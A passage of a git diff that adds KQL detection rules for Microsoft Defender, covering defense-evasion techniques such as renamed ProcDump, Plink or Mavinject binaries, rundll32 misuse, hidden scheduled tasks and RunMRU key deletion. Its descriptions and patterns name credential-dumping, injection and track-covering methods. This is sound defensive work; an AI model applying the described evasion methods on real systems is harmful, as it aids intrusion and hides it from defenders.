(RegistryKey endswith "{2781761E-28E0-4109-99FE-B9D127C57AFE}" or RegistryKey endswith "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}") and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql b/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql new file mode 100644 index 00000000..280e5b30 --- /dev/null +++ b/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql @@ -0,0 +1,10 @@ +// Title: Removal Of Index Value to Hide Schedule Task - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-26 +// Level: medium +// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 + +DeviceRegistryEvents +| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql b/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql new file mode 100644 index 00000000..cdb6d9ad --- /dev/null +++ b/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql @@ -0,0 +1,10 @@ +// Title: Removal Of SD Value to Hide Schedule Task - Registry +// Author: Sittikorn S +// Date: 2022-04-15 +// Level: medium +// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 + +DeviceRegistryEvents +| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "SD") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql b/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql new file mode 100644 index 00000000..491b558b --- /dev/null +++ b/KQL/rules/Defense Evasion/remove_immutable_file_attribute.kql @@ -0,0 +1,12 @@ +// Title: Remove Immutable File Attribute +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: medium +// Description: Detects usage of the 'chattr' utility to remove immutable file attribute. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1222.002 +// False Positives: +// - Administrator interacting with immutable files (e.g. for instance backups). + +DeviceProcessEvents +| where ProcessCommandLine contains " -i " and FolderPath endswith "/chattr" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql new file mode 100644 index 00000000..ff46027a --- /dev/null +++ b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql @@ -0,0 +1,12 @@ +// Title: Remove Scheduled Cron Task/Job +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: medium +// Description: Detects usage of the 'crontab' utility to remove the current crontab. +This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains " -r" and FolderPath endswith "crontab" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql new file mode 100644 index 00000000..31f52e5c --- /dev/null +++ b/KQL/rules/Defense Evasion/renamed_autohotkey_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed AutoHotkey.EXE Execution +// Author: Nasreddine Bencherchali +// Date: 2023-02-07 +// Level: medium +// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (ProcessVersionInfoProductName contains "AutoHotkey" or ProcessVersionInfoFileDescription contains "AutoHotkey" or (ProcessVersionInfoOriginalFileName in~ ("AutoHotkey.exe", "AutoHotkey.rc"))) and (not(((FolderPath endswith "\\AutoHotkey.exe" or FolderPath endswith "\\AutoHotkey32.exe" or FolderPath endswith "\\AutoHotkey32_UIA.exe" or FolderPath endswith "\\AutoHotkey64.exe" or FolderPath endswith "\\AutoHotkey64_UIA.exe" or FolderPath endswith "\\AutoHotkeyA32.exe" or FolderPath endswith "\\AutoHotkeyA32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU32.exe" or FolderPath endswith "\\AutoHotkeyU32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU64.exe" or FolderPath endswith "\\AutoHotkeyU64_UIA.exe") or FolderPath contains "\\AutoHotkey"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql b/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql new file mode 100644 index 00000000..912b2b4c --- /dev/null +++ b/KQL/rules/Defense Evasion/renamed_boinc_client_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed BOINC Client Execution +// Author: Matt Anderson (Huntress) +// Date: 2024-07-23 +// Level: medium +// Description: Detects the execution of a renamed BOINC binary. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "BOINC.exe" and (not(FolderPath endswith "\\BOINC.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql b/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql new file mode 100644 index 00000000..60a038c9 --- /dev/null +++ b/KQL/rules/Defense Evasion/renamed_createdump_utility_execution.kql @@ -0,0 +1,12 @@ +// Title: Renamed CreateDump Utility Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-20 +// Level: high +// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - Command lines that use the same flags + +DeviceProcessEvents +| where (((ProcessCommandLine contains " -u " and ProcessCommandLine contains " -f " and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains " --full " and ProcessCommandLine contains " --name " and ProcessCommandLine contains ".dmp")) or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") and (not(FolderPath endswith "\\createdump.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql new file mode 100644 index 00000000..c53a40fd --- /dev/null +++ b/KQL/rules/Defense Evasion/renamed_mavinject_exe_execution.kql @@ -0,0 +1,12 @@ +// Title: Renamed Mavinject.EXE Execution +// Author: frack113, Florian Roth +// Date: 2022-12-05 +// Level: high +// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_megasync_execution.kql b/KQL/rules/Defense Evasion/renamed_megasync_execution.kql new file mode 100644 index 00000000..c9a77b0e --- /dev/null +++ b/KQL/rules/Defense Evasion/renamed_megasync_execution.kql @@ -0,0 +1,13 @@ +// Title: Renamed MegaSync Execution +// Author: Sittikorn S +// Date: 2021-06-22 +// Level: high +// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Software that illegally integrates MegaSync in a renamed form +// - Administrators that have renamed MegaSync + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "megasync.exe" and (not(FolderPath endswith "\\megasync.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql b/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql new file mode 100644 index 00000000..9101be24 --- /dev/null +++ b/KQL/rules/Defense Evasion/renamed_microsoft_teams_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Microsoft Teams Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-12 +// Level: medium +// Description: Detects the execution of a renamed Microsoft Teams binary. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName in~ ("msteams.exe", "teams.exe")) and (not((FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\teams.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql b/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql new file mode 100644 index 00000000..70447fb1 --- /dev/null +++ b/KQL/rules/Defense Evasion/renamed_msdt_exe_execution.kql @@ -0,0 +1,12 @@ +// Title: Renamed Msdt.EXE Execution +// Author: pH-T (Nextron Systems) +// Date: 2022-06-03 +// Level: high +// Description: Detects the execution of a renamed "Msdt.exe" binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "msdt.exe" and (not(FolderPath endswith "\\msdt.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql b/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql new file mode 100644 index 00000000..154c5e14 --- /dev/null +++ b/KQL/rules/Defense Evasion/renamed_office_binary_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Office Binary Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-20 +// Level: high +// Description: Detects the execution of a renamed office binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_plink_execution.kql b/KQL/rules/Defense Evasion/renamed_plink_execution.kql new file mode 100644 index 00000000..9e8efea5 --- /dev/null +++ b/KQL/rules/Defense Evasion/renamed_plink_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Plink Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-06 +// Level: high +// Description: Detects the execution of a renamed version of the Plink binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName =~ "Plink" or (ProcessCommandLine contains " -l forward" and ProcessCommandLine contains " -P " and ProcessCommandLine contains " -R ")) and (not(FolderPath endswith "\\plink.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql new file mode 100644 index 00000000..29d72669 --- /dev/null +++ b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql @@ -0,0 +1,15 @@ +// Title: Renamed ProcDump Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-11-18 +// Level: high +// Description: Detects the execution of a renamed ProcDump executable. +This often done by attackers or malware in order to evade defensive mechanisms. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Procdump illegally bundled with legitimate software. +// - Administrators who rename binaries (should be investigated). + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName =~ "procdump" or ((ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula"))) and (not((FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql b/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql new file mode 100644 index 00000000..0fc7e3ce --- /dev/null +++ b/KQL/rules/Defense Evasion/renamed_remote_utilities_rat_rurat_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Remote Utilities RAT (RURAT) Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-19 +// Level: medium +// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.collection, attack.command-and-control, attack.discovery, attack.s0592 + +DeviceProcessEvents +| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql new file mode 100644 index 00000000..83e9adf3 --- /dev/null +++ b/KQL/rules/Defense Evasion/response_file_execution_via_odbcconf_exe.kql @@ -0,0 +1,12 @@ +// Title: Response File Execution Via Odbcconf.EXE +// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: medium +// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary. + +DeviceProcessEvents +| where (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") and ProcessCommandLine contains ".rsp" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql b/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql new file mode 100644 index 00000000..6fae094c --- /dev/null +++ b/KQL/rules/Defense Evasion/root_certificate_installed_from_susp_locations.kql @@ -0,0 +1,12 @@ +// Title: Root Certificate Installed From Susp Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains ":\\Windows\\TEMP\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\") and (ProcessCommandLine contains "Import-Certificate" and ProcessCommandLine contains " -FilePath " and ProcessCommandLine contains "Cert:\\LocalMachine\\Root") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql b/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql new file mode 100644 index 00000000..12d6b11e --- /dev/null +++ b/KQL/rules/Defense Evasion/run_powershell_script_from_ads.kql @@ -0,0 +1,10 @@ +// Title: Run PowerShell Script from ADS +// Author: Sergey Soldatov, Kaspersky Lab, oscd.community +// Date: 2019-10-30 +// Level: high +// Description: Detects PowerShell script execution from Alternate Data Stream (ADS) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Get-Content" and ProcessCommandLine contains "-Stream") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql b/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql new file mode 100644 index 00000000..fbaa2c0d --- /dev/null +++ b/KQL/rules/Defense Evasion/run_powershell_script_from_redirected_input_stream.kql @@ -0,0 +1,10 @@ +// Title: Run PowerShell Script from Redirected Input Stream +// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community +// Date: 2020-10-17 +// Level: high +// Description: Detects PowerShell script execution via input stream redirect +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 + +DeviceProcessEvents +| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql b/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql new file mode 100644 index 00000000..01708432 --- /dev/null +++ b/KQL/rules/Defense Evasion/rundll32_execution_with_uncommon_dll_extension.kql @@ -0,0 +1,10 @@ +// Title: Rundll32 Execution With Uncommon DLL Extension +// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou +// Date: 2022-01-13 +// Level: medium +// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (not((ProcessCommandLine =~ "" or ((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".cpl\"" or ProcessCommandLine contains ".cpl'" or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".dll'" or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf," or ProcessCommandLine contains ".inf\"" or ProcessCommandLine contains ".inf'") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".inf")) or ProcessCommandLine contains " -localserver " or isnull(ProcessCommandLine) or ((ProcessCommandLine contains ":\\Windows\\Installer\\" and ProcessCommandLine contains ".tmp" and ProcessCommandLine contains "zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))) and (not((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessCommandLine contains "\\EDGEMITMP_" and InitiatingProcessCommandLine contains ".tmp\\setup.exe" and InitiatingProcessCommandLine contains "--install-archive=" and InitiatingProcessCommandLine contains "--previous-version=" and InitiatingProcessCommandLine contains "--msedgewebview --verbose-logging --do-not-launch-msedge --user-level"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql b/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql new file mode 100644 index 00000000..fc1730b5 --- /dev/null +++ b/KQL/rules/Defense Evasion/rundll32_execution_without_commandline_parameters.kql @@ -0,0 +1,12 @@ +// Title: Rundll32 Execution Without CommandLine Parameters +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-27 +// Level: high +// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 +// False Positives: +// - Possible but rare + +DeviceProcessEvents +| where (ProcessCommandLine endswith "\\rundll32.exe" or ProcessCommandLine endswith "\\rundll32.exe\"" or ProcessCommandLine endswith "\\rundll32") and (not((InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Microsoft\\Edge\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql b/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql new file mode 100644 index 00000000..2542ed68 --- /dev/null +++ b/KQL/rules/Defense Evasion/rundll32_installscreensaver_execution.kql @@ -0,0 +1,12 @@ +// Title: Rundll32 InstallScreenSaver Execution +// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec +// Date: 2022-04-28 +// Level: medium +// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218.011, attack.defense-evasion +// False Positives: +// - Legitimate installation of a new screensaver + +DeviceProcessEvents +| where ProcessCommandLine contains "InstallScreenSaver" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_internet_connection.kql b/KQL/rules/Defense Evasion/rundll32_internet_connection.kql new file mode 100644 index 00000000..330ad0cd --- /dev/null +++ b/KQL/rules/Defense Evasion/rundll32_internet_connection.kql @@ -0,0 +1,12 @@ +// Title: Rundll32 Internet Connection +// Author: Florian Roth (Nextron Systems) +// Date: 2017-11-04 +// Level: medium +// Description: Detects a rundll32 that communicates with public IP addresses +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, attack.execution +// False Positives: +// - Communication to other corporate systems that use IP addresses from public address spaces + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql b/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql new file mode 100644 index 00000000..ab0ec4f3 --- /dev/null +++ b/KQL/rules/Defense Evasion/rundll32_spawned_via_explorer_exe.kql @@ -0,0 +1,10 @@ +// Title: Rundll32 Spawned Via Explorer.EXE +// Author: CD_ROM_ +// Date: 2022-05-21 +// Level: medium +// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe") and (not((ProcessCommandLine contains " C:\\Windows\\System32\\" or ProcessCommandLine endswith " -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql b/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql new file mode 100644 index 00000000..9a627673 --- /dev/null +++ b/KQL/rules/Defense Evasion/rundll32_spawning_explorer.kql @@ -0,0 +1,10 @@ +// Title: RunDLL32 Spawning Explorer +// Author: elhoim, CD_ROM_ +// Date: 2022-04-27 +// Level: high +// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not(InitiatingProcessCommandLine contains "\\shell32.dll,Control_RunDLL")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql b/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql new file mode 100644 index 00000000..a3ae7d5a --- /dev/null +++ b/KQL/rules/Defense Evasion/rundll32_unc_path_execution.kql @@ -0,0 +1,12 @@ +// Title: Rundll32 UNC Path Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-10 +// Level: high +// Description: Detects rundll32 execution where the DLL is located on a remote location (share) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.lateral-movement, attack.t1021.002, attack.t1218.011 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql new file mode 100644 index 00000000..c1d66e6c --- /dev/null +++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql @@ -0,0 +1,13 @@ +// Title: RunMRU Registry Key Deletion +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-25 +// Level: high +// Description: Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog. +In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. +Adversaries may delete this key to cover their tracks after executing commands. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains " del" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql new file mode 100644 index 00000000..21243bfb --- /dev/null +++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql @@ -0,0 +1,13 @@ +// Title: RunMRU Registry Key Deletion - Registry +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-25 +// Level: high +// Description: Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog. +In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands. +Adversaries may delete this key to cover their tracks after executing commands. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.003 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql b/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql new file mode 100644 index 00000000..194f598a --- /dev/null +++ b/KQL/rules/Defense Evasion/safeboot_registry_key_deleted_via_reg_exe.kql @@ -0,0 +1,12 @@ +// Title: SafeBoot Registry Key Deleted Via Reg.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton +// Date: 2022-08-08 +// Level: high +// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " delete " and 